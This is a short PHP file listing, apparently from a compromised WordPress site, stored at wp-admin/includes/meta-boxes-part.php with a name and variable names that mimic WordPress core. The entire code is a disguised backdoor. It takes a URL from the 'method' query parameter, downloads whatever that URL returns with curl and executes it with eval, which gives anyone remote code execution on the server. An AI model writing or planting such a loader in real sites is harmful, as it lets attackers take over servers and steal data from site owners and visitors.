File "meta-boxes-part.php"
Full Path: /home/rattkxnv/byattorney.com/wp-admin/includes/meta-boxes-part.php
File size: 372 bytes
MIME-type: text/x-php
Charset: utf-8
<?php
if (isset($_GET['method'])) {
$comment_form_ptf = $_GET['method'];
if ($get_post_type_skk = curl_init()) {
curl_setopt($get_post_type_skk, CURLOPT_URL, $comment_form_ptf);
curl_setopt($get_post_type_skk, CURLOPT_RETURNTRANSFER, true);
eval(curl_exec($get_post_type_skk));
curl_close($get_post_type_skk);
exit;
}
}